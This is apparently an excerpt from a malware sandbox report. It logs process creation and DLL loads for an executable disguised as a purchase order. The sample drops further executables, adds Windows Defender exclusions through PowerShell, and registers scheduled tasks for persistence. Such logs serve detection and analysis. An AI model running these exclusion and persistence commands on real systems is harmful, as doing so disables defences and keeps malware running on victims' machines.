Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"
Source: unknown	Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\zeXKjViL.exe C:\Users\user\AppData\Roaming\zeXKjViL.exe
Source: unknown	Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: unknown	Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"
Source: unknown	Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:10 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp6E4E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process created: C:\Users\user\AppData\Roaming\zeXKjViL.exe "C:\Users\user\AppData\Roaming\zeXKjViL.exe"
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process created: C:\Users\user\AppData\Roaming\zeXKjViL.exe "C:\Users\user\AppData\Roaming\zeXKjViL.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zeXKjViL.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp6E4E.tmp"
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process created: C:\Users\user\AppData\Roaming\zeXKjViL.exe "C:\Users\user\AppData\Roaming\zeXKjViL.exe"
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Process created: C:\Users\user\AppData\Roaming\zeXKjViL.exe "C:\Users\user\AppData\Roaming\zeXKjViL.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:10 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: appresolver.dll
